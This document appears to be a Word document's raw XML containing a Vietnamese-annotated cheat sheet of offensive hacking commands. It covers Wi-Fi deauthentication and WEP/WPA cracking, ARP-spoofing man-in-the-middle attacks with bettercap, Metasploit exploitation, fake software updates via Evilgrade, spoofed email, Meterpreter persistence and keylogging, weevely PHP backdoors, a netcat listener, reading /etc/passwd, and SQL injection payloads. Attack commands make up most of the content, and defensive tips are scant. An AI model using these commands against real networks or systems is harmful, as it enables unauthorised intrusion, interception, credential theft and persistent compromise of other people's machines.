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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40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40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tập hợp lệnh</w:t>
      </w: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Pre-connection Attack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ifconfig wlan0 down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ifconfig hw ether [address]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hw ether: thay đổi hardware address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Thay đổi địa chỉ MAC của interface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ifconfig wlan0 up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airmon-ng check kill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Kill process có thể gây ảnh hưởng khi ở monitor mode.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iwconfig wlan0 mode monitor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monitor mode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airmon-ng start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airodump-ng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Danh sách các wireless netword xung quanh (2.4GHz).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airodump-ng --band a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Danh sách các wireless netword xung quanh (5GHz).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airodump-ng --band abg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Danh sách các wireless netword xung quanh (2.4-5GHz).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airodump-ng --bssid [MAC Network] --channel [channel] --write [File Name]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Tập trung vào target wireless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aireplay-ng --deauth [num of package] -a [Network MAC] -c [Client MAC]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Gaining Access - WEP Cracking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aircrack-ng [file name.cap]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Crack WEP khi có đủ lượng package.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aireplay-ng --fakeauth [time] -a [Network MAC] -h [Wireless Adapter MAC]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time: thời gian giữa hai lần nỗ lực kết nối.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Giả kết nối vào network dùng WEP/WPA/WPA2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aireplay-ng --arpreplay -b [Network MAC] -h [Wireless Adapter MAC]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ARP Request Replay Attack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Gaining Access - WPA/WPA2 Cracking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wash --interface wlan0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các wireless network có WPS enable.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reaver --bssid [Network MAC] --channel [channel] --interface wlan0 -vvv --no-associate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vvv: hiển thị thêm một số thông tin chi tiết.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no-associate: yêu cầu Reaver không liên kết với mạng mục tiêu.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và thử các PIN đến khi PIN đúng. Nếu PIN đúng, sẽ dùng nó để khôi phục WPA/WPA2 key.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chmod +x reaver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Thay đổi reaver thành executable file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crunch [min] [max] [characters] -t [pattern] -o [fileName]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Ex: crunch 6 8 123abc$ -o wordlist -t a@@@@b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wordlist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man crunch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Xem hướng dẫn sử dụng crunch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 xml:space="preserve">aircrack-ng [fileName.cap] -w [word list file] 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Post-connection Attack - Information Gathering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netdiscover -r [192.168.1.1/24]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r: khoảng ip cần quét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tất cả các device cùng connect vào một network.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zenmap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Mở zenmap program interface.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Post-connection Attack - Man In The Middle Attack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arpspoof -i eth0 -t [target machine] [fake]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i: interface kết nối với target machine.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-t: target machine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Gửi arp response tới target machine.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echo 1 &gt; /proc/sys/net/ipv4/ip_forward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Enable port forwarding, cho phép machine hoạt động như một router.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bettercap -iface [interface]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Mở bettercap program.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net.probe on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net.probe off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net.show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[option] [value]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Modify option trong bettercap.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bettercap -iface [interface] -caplet /root/spoof.cap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caplets.show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danh sách tất cả caplet.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service apache2 start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apache2: tên của web server.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Start web server trên Kali Machine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/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hstshijack/hstshijack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Run hsts plugin.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http-ui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graphical interface của bettercap.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net.sniff.output [path]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file chứa những gì bettercap bắt được.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XARP để phát hiện ARP Poisoning Attack.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HTTPS Everywhere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Cài đặt plugin này để phòng tránh MITM.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Server-side Attack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msfconsole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Khởi chạy Metasploi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[module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module trong Metasploi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options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tất cả các options có thể thay đổi trong một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[option] [value]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giá trị cho các option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exploit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Khởi chạy module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payloads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tất cả các payloads có thể sử dụng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PAYLOAD [payload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Client-side Attack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exploit/multi/handler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module này để lắng nghe các connection đến.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cd /opt/evilgrade/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Tới thư mục Evil Grade đã cài đặt.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./evilgrade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Khởi chạy Evil Grade.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modules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Hiển thị danh sách các chương trình có thể chiếm đoạt update.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configure [module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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080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Redirect data từ better cap đến backdoor proxy program.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Client-side Attack - Social Engineering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sendemail -xu [username] -xp [password] -s [server name:port] -f [from email] -t [to email] -u [title] -m [message] -o message-header=”From: [person name] &lt;from email&gt;”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Post Exploitation - Meterpreter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background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Run session hiện tại ở background.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sessions -l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các sessions hiện có.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sessions -I [session id]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Vào session với id.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ps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tất cả các process.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migrate [pid]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Migrate process của metasploit vào session của máy chủ.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pwd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Get current working directory.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cat [file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Mở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8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download [file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Tải file về máy.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9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 [file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Upload file lên máy chủ.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10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execute -f [file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Thực thi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_service backdoor.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run persistence -h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run persistence -U -i [time interval] -p [port] -r [my ip address]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Bị phát hiện bởi AV.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exploit/windows/local/persistence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EXE_NAME browser.exe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SESSION [session id]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advanced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18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EXE::Custom [backdoor path]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19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keyscan_start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20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keyscan_dump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keyscan_stop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screenshot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exploit/multi/samba/usermap_script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RHOST [metasploit device ip]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show payloads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set PAYLOAD cmd/unix/bind_netcat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use post/multi/manage/autoroute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Website Hacking - Information Gathering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whois.domaintools.com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toolbar.netcraft.com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exploit-db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robtex.com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Sử dụng Bing (ip:[target ip])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tất cả các web site nằm cùng web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6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knockpy [target domain name]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các sub domain.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7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dirb [target website] [word list]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các file nằm trong directory.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Website Hacking - File Upload Vulnerabilities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weevely generate [password] [store path]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Tạo php backdoor file.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weevely [url file] [password]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Website Hacking - Code Execution/Local File Inclusion Vulnerabilities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Có thể sử dụng metasploit để listen connection.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nc -vv -l -p 8080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-vv: verbose output: xem chi tiết output.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-l: listen</w:t>
            </w:r>
          </w:p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-p: port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cat /etc/passwd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Lấy danh sách các user và password.</w:t>
            </w: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  <w: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  <w:t>* Website Hacking - SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="337" w:tblpY="447"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="1151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7"/>
        <w:gridCol w:w="4776"/>
        <w:gridCol w:w="2136"/>
        <w:gridCol w:w="38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STT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Lệnh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Mô tả</w:t>
            </w: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Mục đích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1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select * from users from username = ‘test’ and password = ‘123456’ or 1=1 #’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2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load_file(‘etc/passwd’)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3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sqlmap -u [url]</w:t>
            </w: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4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sqlmap --help</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/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87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  <w:r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  <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="477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213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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="3816" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="144" w:bottom="1440" w:left="144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44330A"/>
    <w:rsid w:val="00633DC9"/>
    <w:rsid w:val="09181CFB"/>
    <w:rsid w:val="0B435DF1"/>
    <w:rsid w:val="1044330A"/>
    <w:rsid w:val="11497F05"/>
    <w:rsid w:val="18F016ED"/>
    <w:rsid w:val="1A774032"/>
    <w:rsid w:val="242A5FE1"/>
    <w:rsid w:val="2517610C"/>
    <w:rsid w:val="259250BA"/>
    <w:rsid w:val="349D55BB"/>
    <w:rsid w:val="3DCD61F1"/>
    <w:rsid w:val="439379B7"/>
    <w:rsid w:val="442D61FF"/>
    <w:rsid w:val="4C8D6B87"/>
    <w:rsid w:val="52954651"/>
    <w:rsid w:val="53BB09E7"/>
    <w:rsid w:val="58A95794"/>
    <w:rsid w:val="5CDE2CC8"/>
    <w:rsid w:val="68DC1358"/>
    <w:rsid w:val="77C101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166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2021-12-17T14:23:00Z</dcterms:created>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-04T16:19:38Z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1033-11.2.0.10426</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>504DE4596B51426C98365D65D3BFEDF4</vt:lpwstr>
  </property>
</Properties>
</file>